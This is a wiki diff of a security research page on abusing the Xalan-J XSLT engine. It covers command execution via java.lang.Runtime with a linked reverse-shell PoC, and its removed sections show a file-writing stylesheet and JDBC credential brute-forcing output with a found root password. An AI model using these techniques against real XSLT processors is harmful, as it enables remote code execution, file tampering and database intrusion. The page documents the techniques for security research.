Changes for page Engine_XalanJ
on 2012/01/12 22:08
on 2012/01/11 23:54
Summary
-
Page properties (1 modified, 0 added, 0 removed)
-
Attachments (0 modified, 0 added, 1 removed)
Details
- Page properties
-
- Content
-
... ... @@ -53,36 +53,6 @@ 53 53 Once Java code execution is possible, it is trivial to execute arbitrary OS commands using the java.lang.Runtime class. The attached PoC will not read the output of the executed command (because loops are hard in XSLT). But this is not a problem if a reverse-shell have already been started, isn't it ;-) 54 54 55 55 |=Namespace|=Extension functions|=PoC 56 -|http:~/~/xml.apache.org/xalan/java|split() ,getRuntime(),exec()andtoString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]]56 +|http:~/~/xml.apache.org/xalan/java|split() + getRuntime() + exec() + toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]] 57 57 58 -__Note__ : as arrays are not a native type in XSLT, we create one in Java via split() before passing it as an argument to [[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]]. 59 - 60 -== File creation == 61 - 62 -The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten. 63 - 64 -|=Namespace|=Extension element|=Parameter|=PoC 65 -|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]] 66 - 67 -== JDBC connectivity == 68 - 69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result. 70 - 71 -|=Namespace|=Extension function|=PoC 72 -|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] 73 - 74 -=== Brute-force === 75 - 76 -The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-). 77 - 78 -Here's the output when launched from the CLI : 79 -$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null 80 -Username : [root] / Password : [] : 81 -Username : [root] / Password : [uberpasswd] : 82 -Username : [root] / Password : [cnam] : OK !! 83 -Username : [pma] / Password : [pma] : 84 - 85 - 86 - 87 - 88 - 58 +__Note__ : as arraye are not a native type in XSLT, we create one in Java via split() before passing it as an argument to [[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]].
- xalanj-write.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -373 bytes - Content
-
... ... @@ -1,13 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:redir="http://xml.apache.org/xalan/redirect" 3 - extension-element-prefixes="redir" 4 - version='1.0'> 5 - 6 - <xsl:template match="/"> 7 - <redir:write file="/tmp/created_by_xalanj_write" method="text"> 8 - <xsl:text>Just a PoC</xsl:text> 9 - </redir:write> 10 - </xsl:template> 11 - 12 -</xsl:stylesheet> 13 -